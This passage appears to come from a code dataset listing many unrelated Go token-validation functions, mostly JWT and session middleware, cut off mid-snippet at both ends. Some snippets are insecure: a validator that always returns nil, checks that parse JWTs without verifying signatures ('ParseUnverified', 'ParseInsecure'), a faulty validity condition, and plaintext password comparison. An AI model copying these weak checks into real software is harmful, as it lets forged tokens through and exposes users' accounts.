in\n\tif !token.Valid {\n\t\terr = ExpiredToken\n\t\tMakeErrorResponse(w, http.StatusUnauthorized, err.Error())\n\t\tlog.Println(err.Error())\n\t\treturn claims, err\n\t}\n\n\t// Check if the token has been signed with the private key of the api gateway\n\tif err != nil {\n\t\tif err == jwt.ErrSignatureInvalid {\n\t\t\t// If the token is expired or has not been signed according to the api gateway key, an Unauthorization code\n\t\t\t// is returned in both cases, but a different message is provided to the client.\n\t\t\tMakeErrorResponse(w, http.StatusUnauthorized, \"Wrong credentials\")\n\t\t\tlog.Println(\"Wrong credentials\")\n\t\t\treturn claims, err\n\t\t}\n\n\t\tMakeErrorResponse(w, http.StatusBadRequest, \"Malformed token\")\n\t\tlog.Println(\"Malformed token\")\n\t\treturn claims, err\n\t}\n\n\treturn claims, nil\n\n}", "func ValidateToken(pathHandler server.HandlerType) server.HandlerType {\n\treturn func(res http.ResponseWriter, req *http.Request) {\n\t\tlog.Printf(\"ValidateToken Received request: %v\", req)\n\t\tprovidedToken := req.Header.Get(tokenRequestHeader)\n\t\tif providedToken == \"\" {\n\t\t\tlog.Println(\"Token required; No token provided.\")\n\t\t\tserver.ReturnUnauthorizedResponse(res)\n\t\t\treturn\n\t\t}\n\n\t\tif actualToken, ok := generatedTokens[providedToken]; ok {\n\t\t\taccessTime := time.Now()\n\t\t\tduration := accessTime.Sub(actualToken.CreatedAt)\n\t\t\tif int(duration.Seconds()) >= actualToken.TTL {\n\t\t\t\tlog.Println(\"Token has expired\")\n\t\t\t\tdelete(generatedTokens, providedToken)\n\t\t\t\tserver.ReturnUnauthorizedResponse(res)\n\t\t\t\treturn\n\t\t\t}\n\t\t\tlog.Println(\"Token validated!\")\n\t\t\tpathHandler(res, req)\n\t\t} else {\n\t\t\tlog.Printf(\"Invalid token provided: %v\", providedToken)\n\t\t\tserver.ReturnUnauthorizedResponse(res)\n\t\t\treturn\n\t\t}\n\t}\n}", "func ValidateToken(appCtx *bearpush.Context) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\tauthHeader := c.Request.Header[\"Authorization\"]\n\t\tif authHeader == nil || len(authHeader) != 1 {\n\t\t\tc.AbortWithStatusJSON(http.StatusForbidden, gin.H{\n\t\t\t\t\"error\": 1,\n\t\t\t\t\"message\": \"Token not provided.\",\n\t\t\t})\n\t\t\treturn\n\t\t}\n\n\t\ttoken := strings.TrimPrefix(authHeader[0], \"Bearer \")\n\t\tproduct := c.Param(\"product\")\n\t\tp, ok := appCtx.Products[product]\n\t\tif !ok {\n\t\t\tc.AbortWithStatusJSON(http.StatusForbidden, gin.H{\n\t\t\t\t\"error\": 2,\n\t\t\t\t\"message\": \"One or more requested resources is not available.\",\n\t\t\t})\n\t\t\treturn\n\t\t}\n\n\t\tif !p.VerifyToken(token) {\n\t\t\tc.AbortWithStatusJSON(http.StatusForbidden, gin.H{\n\t\t\t\t\"error\": 3,\n\t\t\t\t\"message\": \"You are not allowed to access one or more requested resources.\",\n\t\t\t})\n\t\t\treturn\n\t\t}\n\t}\n}", "func (tokenController TokenController) ValidateTokenHandler(w http.ResponseWriter, r *http.Request, next http.HandlerFunc) {\n\n\ttoken, err := request.ParseFromRequest(r, request.AuthorizationHeaderExtractor,\n\t\tfunc(token *jwt.Token) (interface{}, error) {\n\t\t\treturn tokenController.mySigningKey, nil\n\t\t})\n\n\tif err == nil {\n\t\tif token.Valid {\n\t\t\tnext(w, r)\n\t\t} else {\n\t\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\t\tfmt.Fprint(w, \"Token is not valid\")\n\t\t}\n\t} else {\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\tfmt.Fprint(w, \"Unauthorized access to this resource\")\n\t}\n}", "func validateToken(token string) error {\n\treturn nil\n}", "func middlewareIdToken(next http.Handler) http.Handler {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\t \tpathParams := mux.Vars(r)\n\t\t\tif raw, ok := pathParams[\"token\"]; !ok {\n\t\t\t\thttp.Error(w,\"Missing argument: id\", http.StatusForbidden)\n\t\t\t} else {\n\t\t\t\t_,err:= validateIDToken(raw)\n\t\t\t\tif err == nil {\n\t\t\t\t\tlog.Printf(\"Authenticated user\\n\")\n\t\t\t\t\tnext.ServeHTTP(w, r)\n\t\t\t\t} else {\n\t\t\t\t\thttp.Error(w, \"Forbidden\", http.StatusForbidden)\n\t\t\t\t}\n\t\t\t}\n\t})\n}", "func ValidateToken() middleware.Middleware {\n\treturn func(hf http.HandlerFunc) http.HandlerFunc {\n\t\treturn func(rw http.ResponseWriter, r *http.Request) {\n\t\t\trw.Header().Set(\"Content-type\", \"application/json\")\n\n\t\t\tbearerToken := strings.TrimSpace(r.Header.Get(\"Authorization\"))\n\t\t\tif bearerToken == \"\" {\n\t\t\t\thttputils.DispatchHTTPError(rw, \"It was not possible to get the token from the headers\", http.StatusForbidden)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\ttokenParts := strings.Split(bearerToken, \" \")\n\t\t\tif tokenParts[0] != \"Bearer\" {\n\t\t\t\thttputils.DispatchHTTPError(rw, \"It should be Bearer authentication\", http.StatusForbidden)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tuser, err := token.GetUserFromToken(tokenParts[1])\n\t\t\tif err != nil {\n\t\t\t\thttpError := usererrormapper.MapUserErrorToHTTPError(err)\n\t\t\t\thttputils.DispatchHTTPError(rw, httpError.Message, httpError.StatusCode)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tnewHTTPContext := context.WithValue(r.Context(), \"user\", user)\n\t\t\thf(rw, r.WithContext(newHTTPContext))\n\t\t}\n\t}\n}", "func ValidateToken(next http.HandlerFunc) http.HandlerFunc {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) {\n\t\tsession := GetSession(w, req, cookieName)\n\t\taccessToken, setbool := session.Values[\"access_token\"].(string)\n\t\tif setbool == true && accessToken == \"\" {\n\t\t\tRedirectLogin(w, req)\n\t\t\t//return\n\t\t} else if setbool == false {\n\t\t\tRedirectLogin(w, req)\n\t\t} else {\n\t\t\tvar p jwt.Parser\n\t\t\ttoken, _, _ := p.ParseUnverified(accessToken, &jwt.StandardClaims{})\n\t\t\tif err := token.Claims.Valid(); err != nil {\n\t\t\t\t//invalid\n\t\t\t\tRedirectLogin(w, req)\n\t\t\t\t//return\n\t\t\t} else {\n\t\t\t\t//valid\n\t\t\t\tnext(w, req)\n\t\t\t\t//return\n\t\t\t}\n\t\t}\n\t\t//RedirectLogin(w, r)\n\t\treturn\n\t})\n}", "func Validate(token string) (bool, string) {\n\tvar claims Claims\n\n\tt, err := jwt.ParseWithClaims(token, &claims, jwtKeyFunc)\n\tif err != nil {\n\t\treturn false, \"\"\n\t}\n\n\tif time.Now().After(time.Unix(claims.ExpirationUTC, 0)) {\n\t\treturn false, \"\"\n\t}\n\n\treturn t.Valid, claims.UserID\n}", "func Token(app *container.Container) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\n\t\tvar (\n\t\t\tbearer *authorizationHeader = &authorizationHeader{}\n\t\t\tclaims *tokenModels.JWTClaims = &tokenModels.JWTClaims{}\n\t\t\tjwtToken *jwt.Token = &jwt.Token{}\n\t\t\ttoken *tokenModels.Token = &tokenModels.Token{}\n\t\t\tuser *userModels.User = &userModels.User{}\n\t\t)\n\n\t\t// validate authorization header\n\t\terr := c.ShouldBindWith(bearer, binding.Header)\n\t\tok, httpResponse := app.Facades.Error.ShouldContinue(err, &response.ErrValidation)\n\t\tif !ok {\n\t\t\tc.AbortWithStatusJSON(httpResponse.Status, httpResponse)\n\t\t\treturn\n\t\t}\n\n\t\t// split authorization header value, i.e. from Bearer xxx to [\"Bearer\", \"xxx\"]\n\t\tbearerHeader := strings.Split(bearer.Authorization, \" \")\n\t\tif len(bearerHeader) != 2 || bearerHeader[0] != \"Bearer\" {\n\t\t\thttpResponse := response.ErrTokenInvalid\n\t\t\tc.AbortWithStatusJSON(httpResponse.Status, httpResponse)\n\t\t\treturn\n\t\t}\n\n\t\t// validate the token\n\t\tjwtToken, err = app.Facades.Token.ParseWithClaims(bearerHeader[1], claims)\n\t\tok, httpResponse = app.Facades.Error.ShouldContinue(err, &response.ErrTokenInvalid)\n\t\tif !ok {\n\t\t\tc.AbortWithStatusJSON(httpResponse.Status, httpResponse)\n\t\t\treturn\n\t\t}\n\n\t\t// find the user\n\t\terr = app.Facades.User.BindByID(user, claims.Subject)\n\t\tok, httpResponse = app.Facades.Error.ShouldContinue(err, &response.ErrUserNotFound)\n\t\tif !ok {\n\t\t\tc.AbortWithStatusJSON(httpResponse.Status, httpResponse)\n\t\t\treturn\n\t\t}\n\n\t\t// explicitly check for expiry for both refresh and access types\n\t\t// remove if expired\n\t\tnow := time.Now()\n\t\ttokenExpiry := time.Unix(claims.ExpiresAt, 0)\n\n\t\t// if expiry is before now\n\t\tif tokenExpiry.Before(now) {\n\t\t\t// revoke the token\n\t\t\tapp.Facades.User.RevokeTokenByID(claims.ID.String())\n\n\t\t\t// respond\n\t\t\thttpResponse := response.ErrTokenExpired\n\t\t\t// serverErr := logging.NewServerError(err).BindClientErr(httpResponse)\n\t\t\t// c.Error(serverErr)\n\t\t\tc.AbortWithStatusJSON(httpResponse.Status, httpResponse)\n\t\t\treturn\n\t\t}\n\n\t\t// We'll only allow the access token flow in this middleware. If the user has\n\t\t// a refresh token, they should go through a different flow. For example, exchanging\n\t\t// their refresh token for a new access token.\n\t\tif claims.TokenType != enums.JWTTokenTypeAccess {\n\t\t\thttpResponse := response.ErrTokenTypeInvalid\n\t\t\t// serverErr := logging.NewServerError(nil).BindClientErr(httpResponse)\n\t\t\t// c.Error(serverErr)\n\t\t\tc.AbortWithStatusJSON(httpResponse.Status, httpResponse)\n\t\t\treturn\n\t\t}\n\n\t\t// We'll disallow invalid tokens, too.\n\t\tif !jwtToken.Valid {\n\t\t\tfmt.Println(\"here it is\")\n\t\t\thttpResponse := response.ErrTokenInvalid\n\t\t\tc.AbortWithStatusJSON(httpResponse.Status, httpResponse)\n\t\t\treturn\n\t\t}\n\n\t\t// lastly we'll check to see if the token is in the whitelist\n\t\terr = app.Facades.Token.BindByID(token, claims.ID)\n\t\tif err != nil {\n\t\t\thttpResponse := response.ErrTokenNotFound\n\t\t\t// serverErr := logging.NewServerError(err).BindClientErr(httpResponse)\n\t\t\t// c.Error(serverErr)\n\t\t\tc.AbortWithStatusJSON(httpResponse.Status, httpResponse)\n\t\t\treturn\n\t\t}\n\n\t\t// store user in the handler dependencies\n\t\tapp.Current.User = user\n\n\t\t// store the token so we can revoke tokens related to the session\n\t\tapp.Current.Token = token\n\n\t\tc.Next()\n\t}\n}", "func (a *Service) ValidateJweToken(token string) (map[string]interface{}, *error_utils.ApiError) {\n\n\t// parse token string\n\tclaims, err := a.parseTokenString(token)\n\tif err != nil {\n\t\treturn nil, error_utils.NewUnauthorizedError(err.Error())\n\t}\n\n\t// validate dates\n\tif claims[\"orig_iat\"] == nil {\n\t\treturn nil, error_utils.NewUnauthorizedError(\"Orig Iat is missing\")\n\t}\n\n\t// try convert to float64\n\tif _, ok := claims[\"orig_iat\"].(float64); !ok {\n\t\treturn nil, error_utils.NewUnauthorizedError(\"Orig Iat must be float64 format\")\n\t}\n\n\t// get value and validate\n\torigIat := int64(claims[\"orig_iat\"].(float64))\n\tif origIat < a.timeFunc().Add(-a.maxRefresh).Unix() {\n\t\treturn nil, error_utils.NewUnauthorizedError(\"Token is expired\")\n\t}\n\n\t// check if exp exists in map\n\tif claims[\"exp\"] == nil {\n\t\treturn nil, error_utils.NewUnauthorizedError(\"Exp is missing\")\n\t}\n\n\t// try convert to float 64\n\tif _, ok := claims[\"exp\"].(float64); !ok {\n\t\treturn nil, error_utils.NewUnauthorizedError(\"Exp must be float64 format\")\n\t}\n\n\t// get value and validate\n\texp := int64(claims[\"exp\"].(float64))\n\tif exp < a.timeFunc().Unix(){\n\t\treturn nil, error_utils.NewUnauthorizedError(\"Token is expired\")\n\t}\n\t// validate dates\n\n\t// validate issuer\n\t// check if iss exists in map\n\tif claims[\"iss\"] == nil {\n\t\treturn nil, error_utils.NewUnauthorizedError(\"Iss is missing\")\n\t}\n\n\t// try convert to string\n\tif _, ok := claims[\"iss\"].(string); !ok {\n\t\treturn nil, error_utils.NewUnauthorizedError(\"Iss must be string format\")\n\t}\n\n\t// get value and validate\n\tissuer := claims[\"iss\"]\n\tif issuer != a.issuer{\n\t\treturn nil, error_utils.NewUnauthorizedError(\"Invalid issuer\")\n\t}\n\t// validate issuer\n\n\treturn claims, nil\n}", "func ValidateToken(token string) error {\n\n\thour := token[0:2]\n\tiHour, err := strconv.Atoi(hour)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif iHour > 24 || iHour < 0 {\n\t\treturn fmt.Errorf((\"Invalid token hour\"))\n\t}\n\n\tmin := token[2:4]\n\tiMinute, err := strconv.Atoi(min)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif iMinute > 60 || iMinute < 0 {\n\t\treturn fmt.Errorf(\"Invalid token minute\")\n\t}\n\n\treturn nil\n}", "func Validate(redisdb *redis.Client, auth string) (string, error) {\n\n\t// Extract the JWT token from the Authorization header\n\ttokenStr, err := parseAuthHeader(auth)\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"while parsing authorization header: %s\", err.Error())\n\t}\n\n\t// Validate token and extract the subject\n\tsub, err := validateToken(tokenStr)\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"while validating JWT token: %s\", err.Error())\n\t}\n\n\t// Lookup the session in Redis\n\tuser, err := Get(redisdb, sub, \"remote\")\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"while retrieving user ID from session: %s\", err.Error())\n\t}\n\n\treturn user, nil\n\n}", "func ValidateToken(token string) bool {\n\tif len(token) != 32 {\n\t\treturn false\n\t} else if match, _ := regexp.MatchString(\"^[a-zA-Z0-9]*$\", token); !match {\n\t\treturn match\n\t} else {\n\t\treturn true\n\t}\n\n}", "func Check() gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\tvar code int\n\t\tvar token string\n\n\t\tcode = e.SUCCESS\n\t\trToken := c.Request.Header[\"Authorization\"]\n\n\t\tif len(rToken) < 1 {\n\t\t\tcode = e.ERROR_MISSING_TOKEN\n\t\t} else {\n\t\t\ttoken = rToken[0]\n\t\t\tsplitToken := strings.Split(token, \"Bearer\")\n\t\t\ttoken = strings.TrimSpace(splitToken[1])\n\n\t\t\tclaims, err := util.ParseToken(token)\n\t\t\tif err != nil {\n\t\t\t\tcode = e.ERROR_AUTH_CHECK_TOKEN_FAIL\n\t\t\t} else {\n\t\t\t\tif time.Now().Unix() > claims.ExpiresAt {\n\t\t\t\t\tcode = e.ERROR_AUTH_CHECK_TOKEN_TIMEOUT\n\t\t\t\t} else {\n\t\t\t\t\tc.Set(\"id_user\", claims.ID)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tif code != e.SUCCESS {\n\t\t\tc.JSON(http.StatusUnauthorized, gin.H{\n\t\t\t\t\"code\": code,\n\t\t\t\t\"msg\": e.GetMsg(code),\n\t\t\t})\n\t\t\tc.Abort()\n\t\t\treturn\n\t\t}\n\n\t\tc.Next()\n\n\t}\n}", "func (m *manager) Validate(r *http.Request) error {\n\ttokenString, err := getToken(r)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttoken, err := jwt.Parse(tokenString, func(token *jwt.Token) (interface{}, error) {\n\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\treturn nil, fmt.Errorf(\"unexpected signing method was used in JWT token making it invalid: %v\", token.Header[\"alg\"])\n\t\t}\n\n\t\treturn m.secret, nil\n\t})\n\tif err != nil {\n\t\treturn fmt.Errorf(\"%s:%v\", \"invalid JWT token\", err)\n\t}\n\n\tif token == nil {\n\t\treturn fmt.Errorf(\"%s\", \"invalid JWT token\")\n\t}\n\n\tif !token.Valid {\n\t\treturn fmt.Errorf(\"%s\", \"invalid JWT token\")\n\t}\n\n\tfor i := range m.options {\n\t\topt, ok := m.options[i].(*option)\n\t\tif !ok {\n\t\t\treturn fmt.Errorf(\"error in type assertion in jwt token\")\n\t\t}\n\n\t\tswitch opt.optionType {\n\t\tcase optLifeSpan: // do nothing, this option is for the client side\n\t\tcase optEnforceExpiry: // if enforce is set, claims must have expiry\n\t\t\tclaims, ok := token.Claims.(jwt.MapClaims)\n\t\t\tif !ok {\n\t\t\t\treturn fmt.Errorf(\"error in type assertion in jwt claims\")\n\t\t\t}\n\n\t\t\tif _, ok := claims[exp]; !ok {\n\t\t\t\treturn fmt.Errorf(\"all claims must have expiry in their claims\")\n\t\t\t}\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"invalid option type\")\n\t\t}\n\t}\n\n\treturn nil\n}", "func (o LookupAuthorizerResultOutput) IdentityValidationExpression() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupAuthorizerResult) string { return v.IdentityValidationExpression }).(pulumi.StringOutput)\n}", "func Validate(page http.HandlerFunc) http.HandlerFunc {\n\treturn http.HandlerFunc(func(res http.ResponseWriter, req *http.Request) {\n\t\tvar tokenJson string\n\t\ttokenHeader, ok := req.Header[\"Authorization\"]\n\t\tif ok && len(tokenHeader) >= 1 {\n\t\t\ttokenJson = strings.TrimPrefix(tokenHeader[0], \"Bearer \")\n\t\t}\n\n\t\tif tokenJson == \"\" {\n\t\t\thttp.Error(res, http.StatusText(http.StatusUnauthorized), http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\t\tvar tokenArray map[string]string\n\t\tif err := json.Unmarshal([]byte(tokenJson), &tokenArray); err != nil {\n\t\t\tpanic(database.ErrorResponse{Error: err.Error(), StackTrace: string(debug.Stack())})\n\t\t}\n\n\t\tparsedToken, err := jwt.ParseWithClaims(tokenArray[\"token\"], &database.JwtData{}, func(token *jwt.Token) (interface{}, error) {\n\t\t\treturn []byte(database.JsonKey), nil\n\t\t})\n\t\tif err != nil {\n\t\t\thttp.Error(res, err.Error(), http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\t\tif jwtData, ok := parsedToken.Claims.(*database.JwtData); ok && parsedToken.Valid {\n\t\t\tctx := context.WithValue(req.Context(), database.MyKey, *jwtData)\n\t\t\tpage(res, req.WithContext(ctx))\n\t\t} else {\n\t\t\thttp.Error(res, err.Error(), http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\t})\n}", "func (f *Janusgraph) ValidateToken(ctx context.Context, UUID strfmt.UUID, keyResponse *models.KeyGetResponse) (token string, err error) {\n\tq := gremlin.G.V().HasLabel(KEY_VERTEX_LABEL).HasString(\"uuid\", string(UUID))\n\n\tresult, err := f.client.Execute(q)\n\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tvertices, err := result.Vertices()\n\n\t// We got something that are not vertices.\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// No key is found\n\tif len(vertices) == 0 {\n\t\treturn \"\", errors.New(connutils.StaticKeyNotFound)\n\t}\n\n\tif len(vertices) != 1 {\n\t\treturn \"\", fmt.Errorf(\"More than one key with UUID '%v' found!\", UUID)\n\t}\n\n\tvertex := vertices[0]\n\tfillKeyResponseFromVertex(&vertex, keyResponse)\n\ttokenToReturn, err := base64.StdEncoding.DecodeString(vertex.AssertPropertyValue(PROP_KEY_TOKEN).AssertString())\n\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// If success return nil, otherwise return the error\n\treturn string(tokenToReturn), nil\n}", "func ValidateMiddleWare(next http.HandlerFunc) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tauthorizationHeader := r.Header.Get(\"authorization\")\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tif authorizationHeader != \"\" {\n\t\t\tbearerToken := strings.Split(authorizationHeader, \" \")\n\t\t\tclaims := jwt.MapClaims{}\n\t\t\tif len(bearerToken) == 2 {\n\t\t\t\ttoken, error := jwt.ParseWithClaims(bearerToken[1], claims, func(token *jwt.Token) (interface{}, error) {\n\t\t\t\t\tif _, ok := token.Method.(jwt.SigningMethod); !ok {\n\t\t\t\t\t\treturn nil, fmt.Errorf(\"There was an error\")\n\t\t\t\t\t}\n\t\t\t\t\treturn []byte(os.Getenv(\"TOKEN_SALT\")), nil\n\t\t\t\t})\n\t\t\t\tif error != nil {\n\t\t\t\t\tjson.NewEncoder(w).Encode(Exception{Message: error.Error()})\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif token.Valid {\n\t\t\t\t\tcontext.Set(r, \"decoded\", token.Claims)\n\t\t\t\t\tnext(w, r)\n\t\t\t\t} else {\n\t\t\t\t\tjson.NewEncoder(w).Encode(Exception{Message: \"Invalid authorization token\"})\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tjson.NewEncoder(w).Encode(Exception{Message: \"An authorization header is required\"})\n\t\t}\n\t}\n}", "func (jwtAuth *JWTAuth) TokenValid(r *http.Request) error {\n\ttokenStr := jwtAuth.ExtractToken(r)\n\ttoken, err := verifyToken(tokenStr)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif _, ok := token.Claims.(jwt.Claims); !ok && !token.Valid {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func ValidateToken(tokenString string, secretSignKey []byte) (string, error) {\n\ttoken, err := jwt.ParseWithClaims(tokenString, &Claims{}, func(token *jwt.Token) (interface{}, error) {\n\t\treturn secretSignKey, nil\n\t})\n\n\tif claims, ok := token.Claims.(*Claims); ok && token.Valid {\n\t\t// fmt.Printf(\"%v %v\", claims.Email, claims.StandardClaims.ExpiresAt)\n\t\treturn claims.Email, nil\n\t}\n\treturn \"\", err\n}", "func (ds *DefaultSyntax) ValidateExpression(input string) error {\n\terr := ds.validateFields(input)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn ds.tokenize()\n}", "func tokenMatches(cmdToken []byte, payloadToken string) error {\n\tpt, err := tokenDecode(payloadToken)\n\tif err != nil {\n\t\treturn backend.PluginError{\n\t\t\tPluginID: pi.PluginID,\n\t\t\tErrorCode: uint32(pi.ErrorCodeTokenInvalid),\n\t\t\tErrorContext: util.TokenRegexp(),\n\t\t}\n\t}\n\tif !bytes.Equal(cmdToken, pt) {\n\t\treturn backend.PluginError{\n\t\t\tPluginID: pi.PluginID,\n\t\t\tErrorCode: uint32(pi.ErrorCodeTokenInvalid),\n\t\t\tErrorContext: fmt.Sprintf(\"payload token does not \"+\n\t\t\t\t\"match command token: got %x, want %x\",\n\t\t\t\tpt, cmdToken),\n\t\t}\n\t}\n\treturn nil\n}", "func valid(authnHeader []string, vryFunc tokenVerifyFunc) error {\n\tfmt.Printf(\"authnHeader is %v and len(authnHeader) is %v\\n\", authnHeader, len(authnHeader))\n\tif len(authnHeader) < 1 {\n\t\treturn muxhttp.NewRequestError(\n\t\t\terrors.New(\"no authorization header\"),\n\t\t\thttp.StatusUnauthorized)\n\t}\n\ttoken := strings.TrimPrefix(authnHeader[0], \"Bearer \")\n\tfmt.Println(\"token extracted for verification is: \", token)\n\tclaims, err := vryFunc(token)\n\tfmt.Printf(\"tkv.vryFunc(token) err is %v\\n\", err)\n\tfmt.Printf(\"tkv.vryFunc(token) claims is %v\\n\", claims)\n\tif err != nil {\n\t\treturn err\n\t}\n\temail := claims.Email\n\tfmt.Printf(\"claims email is %v\\n\", len(email))\n\tif len(email) < 1 {\n\t\treturn muxhttp.NewRequestError(\n\t\t\terrors.New(\"invalid token without email\"),\n\t\t\thttp.StatusUnauthorized)\n\t}\n\treturn nil\n}", "func formValidationToken(req *http.Request) string {\n\tidx := strings.LastIndex(req.RemoteAddr, \":\")\n\tif idx == -1 {\n\t\tidx = len(req.RemoteAddr)\n\t}\n\tip := req.RemoteAddr[0:idx]\n\ttoHash := fmt.Sprintf(\"%s %s %s\", req.Header.Get(\"User-Agent\"), ip, config.OauthConfig.ClientSecret)\n\thasher := sha256.New()\n\thasher.Write([]byte(toHash))\n\treturn base64.URLEncoding.EncodeToString(hasher.Sum(nil))\n}", "func tokenEmail(s string) (string, bool) {\n\tjwt, err := token.ParseInsecure(s)\n\tif err != nil {\n\t\treturn \"\", false\n\t}\n\treturn jwt.Payload.Email, jwt.Payload.Email != \"\"\n}", "func validateToken(tokenObj token.StructToken) (string, bool) {\n\n\tvar errorfound string\n\t//validate token id ==100\n\t//if len(tokenObj.TokenID) != 100 {\n\t//\terrorfound = \"token ID must be 100 characters\"\n\t//\treturn errorfound, false\n\t//}\n\t//validate token name ==20\n\tif len(tokenObj.TokenName) < 4 || len(tokenObj.TokenName) > 20 {\n\t\terrorfound = \"token name must be more than 4 characters and less than or equal 20 characters\"\n\t\treturn errorfound, false\n\t}\n\t//validate token symbol <= 4\n\tif len(tokenObj.TokenSymbol) > 4 {\n\t\terrorfound = \"token symbol should less than or equal to 4 characters\"\n\t\treturn errorfound, false\n\t}\n\t// validate icon url if empty or ==100\n\t// if len(tokenObj.IconURL) == 0 || len(tokenObj.IconURL) <= 100 {\n\t// \terrorfound = \"\"\n\t// } else {\n\t// \terrorfound = \"Icon URL is optiaonal if enter it must be less or equal 100 characters\"\n\t// \treturn errorfound, false\n\t// }\n\t// validate description if empty or == 100\n\tif len(tokenObj.Description) == 0 || len(tokenObj.Description) <= 100 {\n\t\terrorfound = \"\"\n\t} else {\n\t\terrorfound = \"Description is optiaonal if enter it must be less or equal 100 characters\"\n\t\treturn errorfound, false\n\t}\n\t//validate initiator address if empty\n\tif tokenObj.InitiatorAddress == \"\" {\n\t\terrorfound = \"please enter initiator address (Public key)\"\n\t\treturn errorfound, false\n\t}\n\t//validate initiator address if exist in account data\n\taccountobj := account.GetAccountByAccountPubicKey(tokenObj.InitiatorAddress)\n\tfmt.Println(\"------------------ \", accountobj)\n\tif accountobj.AccountPublicKey == \"\" {\n\t\terrorfound = \"please enter valid initiator address (Public key)\"\n\t\treturn errorfound, false\n\t}\n\tif accountobj.AccountPassword != tokenObj.Password {\n\t\terrorfound = \"The given password is incorrect.\"\n\t\treturn errorfound, false\n\t}\n\n\t//validate Tokens Total Supply less than or equal zero\n\tif tokenObj.TokensTotalSupply < 1 {\n\t\terrorfound = \"please enter Tokens Total Supply more than zero\"\n\t\treturn errorfound, false\n\t}\n\t//validate Tokens value less than or equal zero\n\tif tokenObj.TokenValue <= 0.0 {\n\t\terrorfound = \"please enter Tokens value more than zero\"\n\t\treturn errorfound, false\n\t}\n\t//validate token precision from 0 to 5\n\tif tokenObj.Precision < 0 || tokenObj.Precision > 5 {\n\t\terrorfound = \"please enter Precision range from 0 to 5 \"\n\t\treturn errorfound, false\n\t}\n\t//validate Tokens UsageType is mandatory security or utility\n\tif tokenObj.UsageType == \"security\" || tokenObj.UsageType == \"utility\" {\n\t\terrorfound = \"\"\n\t} else {\n\t\terrorfound = \"please enter UsageType security or utility\"\n\t\treturn errorfound, false\n\t}\n\tif tokenObj.UsageType == \"security\" && tokenObj.Precision != 0 {\n\t\terrorfound = \"UsageType security and must precision equal zero\"\n\t\treturn errorfound, false\n\t}\n\t//validate Tokens TokenType is mandatory public or private\n\tif tokenObj.TokenType == \"public\" || tokenObj.TokenType == \"private\" {\n\t\t// check type token is public, validating for enter contact ID\n\t\tif tokenObj.TokenType == \"public\" {\n\t\t\t// validate ContractID if empty or ==60\n\t\t\tif len(tokenObj.ContractID) < 4 || len(tokenObj.ContractID) > 60 {\n\t\t\t\terrorfound = \"enter ContractID must be more than 4 character and less than or equal 60 characters\"\n\t\t\t\treturn errorfound, false\n\t\t\t}\n\t\t}\n\t\t// check type token is Private , validating for enter pentential PK ,\n\t\t// enter the potential users public keys which can use this token\n\t\taccountList := accountdb.GetAllAccounts()\n\t\tif tokenObj.TokenType == \"private\" {\n\t\t\t//enter pentential PK which can use this token\n\t\t\tif len(tokenObj.UserPublicKey) != 0 {\n\t\t\t\tfor _, pk := range tokenObj.UserPublicKey {\n\t\t\t\t\tif pk == tokenObj.InitiatorAddress {\n\t\t\t\t\t\terrorfound = \"user create token can't be in user public key \"\n\t\t\t\t\t\treturn errorfound, false\n\t\t\t\t\t}\n\t\t\t\t\tif !containspk(accountList, pk) {\n\t\t\t\t\t\terrorfound = \"this public key is not associated with any account\"\n\t\t\t\t\t\treturn errorfound, false\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\terrorfound = \"enter the potential users public keys which can use this token\"\n\t\t\t\treturn errorfound, false\n\t\t\t}\n\t\t}\n\t} else {\n\t\terrorfound = \"please enter TokenType is public or private\"\n\t\treturn errorfound, false\n\t}\n\n\t// Dynamic price\tIf the price of token is dynamic it gets its value from bidding platform.\n\t// Bidding platform API URL.\n\t// based on ValueDynamic True or false\n\tif tokenObj.ValueDynamic == true {\n\t\t//for example value\n\t\tbiddingplatformValue := 5.5\n\t\ttokenObj.Dynamicprice = biddingplatformValue\n\t}\n\treturn \"\", true\n}", "func ValidateToken(token string) (string, error) {\n username, exists := Sessions[token];\n if (!exists) {\n return \"\", apierrors.TokenValidationError{apierrors.TOKEN_VALIDATION_NO_TOKEN};\n }\n\n return username, nil;\n}", "func AuthAPIUserInvalidToken(t *testing.T, pact *dsl.Pact) {\n\n\t// Base64 encoded '{\"alg\":\"RS256\",\"kid\":\"1aA2bBc3CDDdEEefff7gGHH_ii9jJjkkkLl2mmm4NNO\",\"typ\":\"JWT\"}somerandombytes'\n\tvar invalidToken = \"eyJhbGciOiJSUzI1NiIsImtpZCI6IjFhQTJiQmMzQ0REZEVFZWZmZjdnR0hIX2lpOWpKamtra0xsMm1tbTROTk8iLCJ0eXAiOiJKV1QifXNvbWVyYW5kb21ieXRlcw\"\n\n\t// Pass in test 